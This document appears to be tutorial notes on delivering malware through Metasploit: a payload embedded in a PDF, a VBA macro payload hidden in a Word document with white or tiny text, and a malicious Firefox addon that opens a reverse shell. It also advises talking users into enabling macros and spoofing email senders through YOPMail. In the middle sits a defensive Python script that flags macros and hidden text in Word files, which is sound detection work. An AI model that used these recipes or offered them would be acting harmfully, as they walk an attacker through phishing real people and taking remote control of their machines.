Embedding Malware in PDFs
- Launch Metasploit
- search adobe_pdf
- set options
- set Payload
- set INFILENAME /root/Desktop/syllabus.pdf
- set FILENAME bad_syllabus.pdf
- set LHOST <IP Address>
- exploit
- From here you can send the file by email, flash drive, etc.
Embedding Malware into MACRO Word document
- Creating a malicious executable
- Converting it to a Visual Basic script (macro code)
- Creating an MS Word document
- Starting the listener
- Opening the malicious document
- Collecting the session
Tool for embedding into a Word document: exe2vba
This tool in Kali can be located in /usr/share/metasploit-framework/tools/exploit
Run the tool: sudo msf-exe2vba <exe (your malicious file)> <VBA (create new one)>
Now go to the Windows machine and transfer the new vba file
Create a new Word document.
Create a macro:
- View tab
- Macros
- View macros
- give name
- create
Open the VBA file, copy the macro code part, and paste it into the macro code page in Word.
Save changes.
We still have to embed the payload into the document.
Copy the payload data part from the VBA file and
paste it into the Word document.
Shrinking the font size makes it seem like a regular document. You can also make the text white.
Because macros are disabled by default, the end user has to be convinced to enable them.
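The document built in this section leaves two traces a defender can check before anyone opens it: a VBA project inside the file, and body text formatted to be unreadable (white or very small font). The following triage script is an added example, not part of the original notes; the function names, thresholds and sample documents are assumptions constructed for illustration, and it only handles OOXML files (.docx/.docm).

```python
import io
import re
import zipfile

TINY_HALF_POINTS = 4   # assumption: w:sz is in half-points, so this flags text <= 2 pt
MIN_HIDDEN_CHARS = 64  # assumption: ignore a stray white space or bullet

def triage_word(data: bytes) -> list:
    """Return triage findings for a .docx/.docm file passed as raw bytes."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not-ooxml"]  # e.g. legacy .doc; needs an OLE parser instead
    findings = []
    with archive:
        names = archive.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            findings.append("vba-project")
        if "word/document.xml" not in names:
            return findings + ["no-document-xml"]
        xml = archive.read("word/document.xml").decode("utf-8", "replace")
    hidden = 0
    # Walk each text run (<w:r>) and count characters styled white or tiny.
    for run in re.findall(r"<w:r[ >].*?</w:r>", xml, re.S):
        text = "".join(re.findall(r"<w:t(?:\s[^>]*)?>(.*?)</w:t>", run, re.S))
        white = re.search(r'<w:color\b[^>]*w:val="FFFFFF"', run, re.I)
        size = re.search(r'<w:sz\b[^>]*w:val="(\d+)"', run)
        tiny = size is not None and int(size.group(1)) <= TINY_HALF_POINTS
        if white or tiny:
            hidden += len(text)
    if hidden >= MIN_HIDDEN_CHARS:
        findings.append(f"hidden-text:{hidden}")
    return findings

def build_sample(body_xml: str, with_macro: bool) -> bytes:
    """Constructed test input: only the ZIP parts this scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml",
                   f"<w:document><w:body>{body_xml}</w:body></w:document>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"constructed placeholder")
    return buf.getvalue()

BENIGN = build_sample("<w:p><w:r><w:t>Course syllabus</w:t></w:r></w:p>", False)
SUSPECT = build_sample(
    "<w:p><w:r><w:t>Course syllabus</w:t></w:r>"
    '<w:r><w:rPr><w:color w:val="FFFFFF"/><w:sz w:val="2"/></w:rPr>'
    "<w:t>" + "A" * 200 + "</w:t></w:r></w:p>", True)
```

A document that returns both `vba-project` and `hidden-text` findings is a strong candidate for quarantine at the mail gateway or for analyst review.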
Sending malware as browser addon
Another way to compromise a target is to send the malware as a browser addon.
Metasploit can be used to create this.
- Launch Metasploit framework
- search firefox_xpi
- use
- show payloads
- use shell payload with reverse tcp connection
- set SRVHOST: this is the host where the server will be started. This will be our machine
- set SRVPORT: you can use 8080 for this
- set URIPATH: this is the path of the payload
- set LHOST
- exploit
You can now copy the URL and paste it in the address bar to verify the server is running.
For sending a link through email, you can use YOPMail.com. This will allow you to spoof a sender.